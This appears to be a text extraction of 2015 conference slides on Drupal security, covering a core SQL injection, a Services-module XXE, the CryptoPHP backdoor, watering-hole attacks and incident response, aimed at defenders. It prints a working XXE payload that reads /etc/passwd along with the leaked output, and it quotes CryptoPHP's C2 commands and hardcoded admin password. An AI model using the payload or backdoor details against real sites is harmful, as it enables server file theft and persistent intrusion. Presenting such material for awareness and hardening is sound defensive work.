Drupal, Lessons learnt from real world security incidents Dr. Pedram Hayati Partner and Security Consultant elttam DrupalGlamp, Sydney, 5 September 2015
Drupal, Lessons learnt from real world security incidentsDr. Pedram HayatiPartner and Security Consultant elttam
DrupalGlamp, Sydney, 5 September 2015
Drupal SecurityLooking from an attacker angleTargeting the software• Publically known weaknesses or 0days• Drupal core or modules
Targeting a user• Social engineering
Targeting a developer• Watering hole attacks
What a security tester should know!Security is not a high priority• Sad but true• If a software is not usable, it doesn’t matter it is secure or not.• Security tester is not the only stakeholder
Learn the terminology• Defect and bug instead of 0day and vulnerability• Enhancement instead of best practice recommendation
Explain “how to fix” not “how to break”• Security tester excited to show how to hack the planet• Dev care about how to effectively fix things• One size doesn’t fit all.• Spend a lot on issue detail but less on remediation plan.
Show some respect!• Bashing developers and being negative toward them.
Targeting software
Pre-Auth SQL Injection in Drupal Core15 October 2014• A major SQL injection vulnerability with in Drupal Core
CVE-2014-3704• Likelihood: Pre-auth• Impact: privilege escalation, code execution• You are likely compromised if you haven’t patched your Drupal within
7 hours of this issue being announced. • https://www.drupal.org/node/2357241
Hardening - GenericRemember, Drupal has a higher risk profile. • Subscribe to security feeds• Have backups and make sure they work• Be ready and prepare your (basic) incident response strategy• References
Drupal security feed: https://www.drupal.org/security/psa Security team contact: https://security.drupal.org/team-members Incident response plan:
http://www.comptechdoc.org/independent/security/policies/incident-response-plan.html
https://twitter.com/drupalsecurity
Hardening – Secure codingPrinciple #1: Defend as close as possible to destination• Use parametrized queries
Use db_query() and db_rewrite_sql() and never concatenate the data• Use Drupal’s check functions for output filtering
Use check_plain(), check_markup(), check_url and filter_xss() • There is no JavaScript validation
Principle #2: It is not just input and output handling• Understand Cross-Site Request Forgery (XSRF)• Use Form API
Principle #3: File upload is difficult to secure• Avoid file upload where possible• Re-produce the file (e.g. GD library)• Check Mime, magic numbers, byte codes.
Hardening – Secure codingPrinciple #4: Remember hash algorithm is ever evolving• Md5 = plaintext. Sha1 ~= plaintext• Use a slow hashing algorithm
Scrypt -> bcrypt (15 rounds)-> PBKDF2 with SHA256• Salt the hash• Use Hash-based Message Authentication Code (HMAC)• drupal_hmac uses sha256 that is not recommended.
Pre-Auth XXE24 March 2015• XML External Entity (XXE)
XML document has a reference to user controllable field that include an external entity
• A weakness within Service module• Allow arbitrary file read (e.g. settings.php)• By Renaud Dubourguais from Synactive on 24 March 2015• http://www.synacktiv.fr/ressources/synacktiv_drupal_xxe_services.pdf
Pre-Auth XXE: Sample payloadPOST /drupal7.28/?q=test/node HTTP/1.1[...]<!DOCTYPE root [<!ENTITY % evil SYSTEM "file:///etc/passwd">%evil;]><xml> <test>test</test></xml>
Pre-Auth XXE: Response<?xml version="1.0" encoding="utf8"?><result>Line 5, Col 9: failed to load external entity &quot;file://W00Tcm9vdDp4OjA6MDpyb290Oi9yb290Oi9iaW4vYmFzaApkYWVtb246eDoxOjE6ZGFlbW9uOi91c3Ivc2JpbjovdXNyL3NiaW4vbm9sb2dpbgpiaW46eDoyOjI6YmluOi9iaW46L3Vzci9zYmluL25vbG9naW4Kc3lzOng6MzozOnN5czovZGV2Oi91c3Ivc2Jpbi9ub2xvZ2luCnN5bmM6eDo0OjY1NTM0OnN5bmM6L2JpbjovYmluL3N5bmMKZ2FtZXM6eDo1OjYwOmdhbWVzOi91c3IvZ2FtZXM6L3Vzci9zYmluL25vbG9naW4KbWFuOng6NjoxMjptYW46L3Zhci9jYWNoZS9tYW46L3Vzci9zYmluL25vbG9naW4KbHA6eDo3Ojc6bHA6L3Zhci9zcG9vbC9scGQ6L3Vzci9zYmluL25vbG9naW4KbWFpbDp4Ojg6ODptYWlsOi92YXIvbWFpbDovdXNyL3NiaW4vbm9sb2dpbgpuZXdzOng6OTo5Om5ld3M6L3Zhci9zcG9vbC9uZXdzOi91c3Ivc2Jpbi9ub2xvZ2luCnV1Y3A6eDoxMDoxMDp1dWNwOi92YXIvc3Bvb2wvdXVjcDovdXNyL3NiaW4vbm9sb2dpbgpwcm94eTp4OjEzOjEzOnByb3h5Oi9iaW46L3Vzci9zYmluL25vbG9naW4Kd3d3LWRhdGE6eDozMzozMzp3d3ctZGF0YTovdmFyL3d3dzovdXNyL3NiaW4vbm9sb2dpbgpiYWNrdXA6eDozNDozNDpiYWNrdXA6L3Zhci9iYWNrdXBzOi91c3Ivc2Jpbi9ub2xvZ2luCg==W00T&quot;Line 9, Col 27: Opening and ending tag mismatch: test line 9 and type</result>
Pre-Auth XXE: Reponseroot:x:0:0:root:/root:/bin/bashdaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologinbin:x:2:2:bin:/bin:/usr/sbin/nologinsys:x:3:3:sys:/dev:/usr/sbin/nologinsync:x:4:65534:sync:/bin:/bin/syncgames:x:5:60:games:/usr/games:/usr/sbin/nologinman:x:6:12:man:/var/cache/man:/usr/sbin/nologinlp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologinmail:x:8:8:mail:/var/mail:/usr/sbin/nologinnews:x:9:9:news:/var/spool/news:/usr/sbin/nologinuucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologinproxy:x:13:13:proxy:/bin:/usr/sbin/nologinwwwdata:x:33:33:wwwdata:/var/www:/usr/sbin/nologinbackup:x:34:34:backup:/var/backups:/usr/sbin/nologin
How to fix it?Input validation?Output validation or rendering?Business logic• Access control
Targeting user
CryptoPHP20 November 2014 by Fox it• Large number of backdoored CMS including Drupal, Joomla and
Wordpress• Use for Blackhat SEO
CryptoPHPC2 communication{
"servers":["127.0.0.1","127.0.0.2"],"eval":["print(system('ls-la'));","phpinfo();"],"echo":["stringstobeechoed","etc."],
}Mail communication• For failover
Manual control• http://127.0.0.1/index.php?<serverkey>=reset
Encrypted communicationAdds a new admin account for future access• Username: system[0-9]*• Password: FUHIAsbdiugAS
CryptoPHPSpread through• Pirated themes• Commercial plugins for free• Nulled scripts
RemediationLook inside your theme (and modules) directory for:
<?phpinclude('images/social.png');?>
Check the authenticity of your packages• Use legitimate sources
Check the integrity of the downloaded packages• Checksum
More info: https://foxitsecurity.files.wordpress.com/2014/11/cryptophp- whitepaper-foxsrt-v4.pdf
Targeting developer
Watering Hole AttackAn attack strategy targeted toward user groups• Developers, operations, normal users
Commonly a website that is used by the victim group is infected. The victim group will be eventually infected through infected website.November 2014• Forbes.com compromised• 0day for IE and Flash• Target
US defence Financial services
AwarenessDevelopers• Typically have high privileged access on the local machine or network services• Increase security of your browser
Addon: NoScripts Addon: Web of Trust (WOT) Use different profile or browser for surfing web and doing work Have a read about capabilities of BeEF framework
http://beefproject.com/ • Increase security of your email client
Increase security settings of Outlook Default all emails to plain text
Keep personal and work email in a separate email clients Even on your smart phone
• Use trusted sources• Verify the integrity of downloaded files
Unhack my website1. Make a (forensic) copy of your entire server
1. Do not change anything2. Get an snapshot of your Cloud/VM instance
2. Take your website offline3. Notify users and stakeholders.4. Start the investigation progress
1. It is likely automated. Search for known signatures2. Check integrity of all files
1. Drupal Hacked module: https://www.drupal.org/project/hacked 3. Use available tools
1. Sort files and other data base on time2. Create a timeline
4. Call for help5. Rebuild your website
1. Restore an older snapshot 2. Apply all patches.
BonusAn actual attack can come days later• There are different threat actors are behind attacks:
https://blog.smarthoneypot.com/in-depth-analysis-of-ssh-attacks-on-amazon-ec2/ • Go back in time
Malware names are randomised • Look into outbound network connections• tcpdump
Malware are renamed to a legitimate executables• Your best friends
lsof strace nestat
Wrap upMy point was to provide you with awarenessAttackers find easiest and most effective way to target• Software• Users• Developers
Keep up-to-date with Drupal security feedGet yourself engaged in local security communities.
Thank YouTo receive recommendations on protecting your Drupal, reach me at:Email: [email protected]: pi3chWeb: https://elttam.com.au